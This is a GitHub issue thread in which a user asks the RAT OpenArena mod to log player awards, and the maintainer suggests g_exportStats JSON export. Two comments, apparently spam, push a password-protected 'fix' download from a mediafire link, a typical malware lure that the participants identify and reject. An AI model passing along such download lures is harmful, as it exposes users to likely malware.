### ISSUE TITLE
Write awards into log file

### ISSUE THREAD

**Issue by Konrad20046** [rdntcntrl/ratoa_gamecode#48]
Hello,

First of all thank you for your nice work on RAT for OpenArena, I really enjoy this mod.

During a game players get awards (such as "air rocket", "ambush", "rocket sniper", "rat"...).

I would like to ask you if it would be possible for RAT mod to write awards into the log file (by default games.log).

The base game OpenArena writes awards ("impressive", etc.), but when running RAT I do not see the awards in the log file.

Thanks

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Konrad20046** [comment]
A strange ZIP file to download from an external site? Yeah I don't believe you, I'll wait for a serious answer and code actually posted on GitHub

**Comment by rdntcntrl** [comment]
> A strange ZIP file to download from an external site? Yeah I don't believe you, I'll wait for a serious answer and code actually posted on GitHub

Looks like Github got rid of this spammer for us.

**Comment by rdntcntrl** [comment]
> I would like to ask you if it would be possible for RAT mod to write awards into the log file (by default games.log).

Before we add this, may I ask what you need this for?
In case you are intending to parse the log file, there is already an option to export statistics by setting `g_exportStats 1` which may be more convenient. This will write a JSON file at the end of a game which includes all the awards the players got.

**Comment by Konrad20046** [comment]
Thanks a lot for your answer!

I did not know about the "g_exportStats" keyword. I just looked into it, and it produces one JSON file for each game played. On a server where many games are played every day, that is a lot of different files to parse.

Actually I already have a program (qscore written in C) to parse the log file (games.log) and extract all information (player names, frags, flags captured, awards...), and output stats in html format. It works very well with OpenArena, but in RAT the awards are not in the log file, so it can not extract it. And modifying this C code to parse the JSON files would be quite difficult...

So, if RAT awards could be written in the log file that would be great! I hope that it is not too much to ask.

Thanks again for your work on this great mod.
